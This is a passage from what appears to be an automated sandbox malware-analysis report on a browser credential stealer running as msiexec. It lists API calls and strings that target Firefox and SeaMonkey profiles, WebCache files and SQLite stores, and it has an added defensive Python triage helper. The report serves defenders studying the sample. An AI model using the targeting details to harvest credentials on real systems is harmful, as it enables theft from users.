  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
Strings
Similarity
• API ID: memset$wcscpy$wcslen$FolderPathSpecial_snwprintfmemcpywcscat
• String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
• API String ID: 3327325665-2068335096
APIs
• memset.MSVCRT ref: 00403FE1
• memset.MSVCRT ref: 00403FF6
• memset.MSVCRT ref: 0040400B
• memset.MSVCRT ref: 00404020
• memset.MSVCRT ref: 00404035
  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
• memset.MSVCRT ref: 004040FC
  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
Strings
Similarity
• API ID: memset$wcscpy$wcslen$FolderPathSpecial_snwprintfmemcpywcscat
• String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
• API String ID: 3327325665-3369679110
APIs
• memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
Strings
Similarity
• API ID: memcpy
• String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
• API String ID: 3510742995-2641926074
APIs
• CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
• GetLastError.KERNEL32 ref: 0041847E
• free.MSVCRT ref: 0041848B
Strings
Similarity
• API ID: CreateErrorFileLastfree
• String ID: |A
• API String ID: 981974120-1717621600
APIs
  • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
  • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
  • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
• memset.MSVCRT ref: 004033B7
• memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
• wcscmp.MSVCRT ref: 004033FC
• _wcsicmp.MSVCRT ref: 00403439
Strings
                                                                                                    Similarity
                                                                                                    • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                                    • String ID: $0.@
                                                                                                    • API String ID: 2758756878-1896041820
                                                                                                    • Opcode ID: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                                    • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                    • Opcode Fuzzy Hash: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                                    • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 2941347001-0
                                                                                                    • Opcode ID: 42456554a4125e12c9760a290a1ae7f8766add3746ffa376f76814c589a7dd26
                                                                                                    • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                    • Opcode Fuzzy Hash: 42456554a4125e12c9760a290a1ae7f8766add3746ffa376f76814c589a7dd26
                                                                                                    • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00403C09
                                                                                                    • memset.MSVCRT ref: 00403C1E
                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                      • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                      • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                    • wcscat.MSVCRT ref: 00403C47
                                                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                    • wcscat.MSVCRT ref: 00403C70
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memsetwcscat$FolderPathSpecialwcscpywcslen
                                                                                                    • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                    • API String ID: 4120512944-1174173950
                                                                                                    • Opcode ID: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                                                    • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                    • Opcode Fuzzy Hash: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                                                    • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                    APIs
                                                                                                    • wcschr.MSVCRT ref: 00414458
                                                                                                    • _snwprintf.MSVCRT ref: 0041447D
                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                    • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                    • String ID: "%s"
                                                                                                    • API String ID: 1343145685-3297466227
                                                                                                    • Opcode ID: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                                    • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                    • Opcode Fuzzy Hash: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                                                    • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                    • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProcProcessTimes
                                                                                                    • String ID: GetProcessTimes$kernel32.dll
                                                                                                    • API String ID: 1714573020-3385500049
                                                                                                    • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                    • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                    • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                    • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004087D6
                                                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                      • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                    • memset.MSVCRT ref: 00408828
                                                                                                    • memset.MSVCRT ref: 00408840
                                                                                                    • memset.MSVCRT ref: 00408858
                                                                                                    • memset.MSVCRT ref: 00408870
                                                                                                    • memset.MSVCRT ref: 00408888
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 2911713577-0
                                                                                                    • Opcode ID: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                                                    • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                    • Opcode Fuzzy Hash: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                                                    • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                    APIs
                                                                                                    • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                                    • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                                    • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcmp
                                                                                                    • String ID: @ $SQLite format 3
                                                                                                    • API String ID: 1475443563-3708268960
                                                                                                    • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                    • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                    • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                    • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
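                                                                                                    The two function blocks above that carry strings are the two halves of the browser-credential harvesting path: one concatenates `Mozilla\Firefox\Profiles` and `Mozilla\Profiles` onto the folder returned by SHGetSpecialFolderPathW with CSIDL 0x1A (CSIDL_APPDATA), and the one directly above runs memcmp over the first 16 bytes of a candidate file against `SQLite format 3` before touching it. The following Python triage helper is an added example, not code from the report or from the sample: it reproduces both checks from the defender's side, listing the profile roots the stealer would walk and validating the SQLite 3 file header properly (magic, page size, text encoding) rather than by a bare magic compare. The file names `key4.db` and `logins.json` in the usage section are illustrative assumptions, and the header bytes are constructed inline so the block runs offline.

```python
"""Triage helper for the Firefox profile paths and SQLite magic check seen in the dump."""
import ntpath
import struct
from typing import Optional

# Relative paths taken from the strings referenced in the dumped code.
# CSIDL 0x1A handed to SHGetSpecialFolderPathW is CSIDL_APPDATA (Roaming).
FIREFOX_PROFILE_SUBDIRS = (r"Mozilla\Firefox\Profiles", r"Mozilla\Profiles")

SQLITE_MAGIC = b"SQLite format 3\x00"   # 16 bytes, NUL included, as memcmp'd above
SQLITE_HEADER_LEN = 100                   # fixed-size SQLite 3 file header
TEXT_ENCODINGS = {1: "UTF-8", 2: "UTF-16le", 3: "UTF-16be"}


def candidate_profile_roots(appdata_dir: str) -> list:
    """Directories the stealer concatenates onto %APPDATA% before walking them."""
    return [ntpath.join(appdata_dir, sub) for sub in FIREFOX_PROFILE_SUBDIRS]


def is_sqlite3(data: bytes) -> bool:
    """Equivalent of memcmp(data, "SQLite format 3", 16) == 0 in the dump."""
    return data[:16] == SQLITE_MAGIC


def parse_sqlite_header(data: bytes) -> Optional[dict]:
    """Decode the 100-byte SQLite 3 header; None if the file is not a plausible database.

    Rejecting truncated or inconsistent headers keeps a renamed text file or a
    half-written download from being reported as a live credential store.
    """
    if len(data) < SQLITE_HEADER_LEN or not is_sqlite3(data):
        return None
    # All multi-byte header fields are big-endian.
    page_size, write_ver, read_ver, reserved = struct.unpack_from(">HBBB", data, 16)
    change_counter, page_count = struct.unpack_from(">II", data, 24)
    encoding_code, user_version = struct.unpack_from(">II", data, 56)
    sqlite_version = struct.unpack_from(">I", data, 96)[0]
    if page_size == 1:                      # format's special value for 65536
        page_size = 65536
    if page_size < 512 or page_size > 65536 or page_size & (page_size - 1):
        return None                         # must be a power of two in range
    return {
        "page_size": page_size,
        "write_version": write_ver,         # 1 = rollback journal, 2 = WAL
        "read_version": read_ver,
        "reserved_per_page": reserved,
        "change_counter": change_counter,
        "page_count": page_count,
        "text_encoding": TEXT_ENCODINGS.get(encoding_code, "unknown"),
        "user_version": user_version,
        "sqlite_version": sqlite_version,
    }


def build_sample_header(page_size=4096, encoding=1, pages=7, sqlite_version=3045001) -> bytes:
    """Constructed sample header (not captured from the sample) for offline runs."""
    hdr = bytearray(SQLITE_HEADER_LEN)
    hdr[:16] = SQLITE_MAGIC
    struct.pack_into(">HBBB", hdr, 16, 1 if page_size == 65536 else page_size, 1, 1, 0)
    hdr[21:24] = bytes([64, 32, 32])         # payload fractions fixed by the format
    struct.pack_into(">II", hdr, 24, 3, pages)   # change counter, page count
    struct.pack_into(">II", hdr, 56, encoding, 0)
    struct.pack_into(">I", hdr, 96, sqlite_version)
    return bytes(hdr)


def triage(files: dict) -> dict:
    """Map file name -> header summary (or None) for a dict of name -> leading bytes."""
    return {name: parse_sqlite_header(data) for name, data in files.items()}


if __name__ == "__main__":
    # Constructed inputs: a database-shaped file, a JSON file, and a file that
    # carries the magic but nothing else (the bare memcmp would accept it).
    sample = {
        "key4.db": build_sample_header(),
        "logins.json": b'{"nextId":1,"logins":[]}',
        "truncated.sqlite": SQLITE_MAGIC + b"\x10\x00",
    }
    for root in candidate_profile_roots(r"C:\Users\alice\AppData\Roaming"):
        print("stealer would walk:", root)
    for name, info in triage(sample).items():
        print(name, "->", info)
```

                                                                                                    When hunting on a suspected host, feed the first 100 bytes of every file under the listed roots into `triage`; anything that parses as SQLite with a non-zero `change_counter` is a store the process in the report could have read, and `write_version == 2` means a WAL file sits beside it and should be collected as well.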
                                                                                                    APIs
                                                                                                      • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                    • memset.MSVCRT ref: 00414C87
                                                                                                    • wcscpy.MSVCRT ref: 00414CFC
                                                                                                      • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                    Strings
                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressFolderPathProcSpecialVersionmemsetwcscpy
                                                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                    • API String ID: 1557896971-2036018995
                                                                                                    • Opcode ID: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                                    • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                    • Opcode Fuzzy Hash: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                                                    • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcsicmpqsort
                                                                                                    • String ID: /nosort$/sort
                                                                                                    • API String ID: 1579243037-1578091866
                                                                                                    • Opcode ID: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                                    • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                    • Opcode Fuzzy Hash: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                                                    • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040E60F
                                                                                                    • memset.MSVCRT ref: 0040E629
                                                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                    Strings
                                                                                                    • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                    • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                                                    • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                    • API String ID: 2887208581-2114579845
                                                                                                    • Opcode ID: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                                                    • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                    • Opcode Fuzzy Hash: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                                                    • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset
                                                                                                    • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                    • API String ID: 2221118986-1725073988
                                                                                                    • Opcode ID: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                                                    • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                    • Opcode Fuzzy Hash: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                                                    • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                    APIs
                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                    • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000F.00000002.2596673873.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    • Associated: 0000000F.00000002.2596673873.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$memcmp
                                                                                                    • String ID: $$8
                                                                                                    • API String ID: 2808797137-435121686
                                                                                                    • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                    • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                    • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                    • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                      • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                      • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                      • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
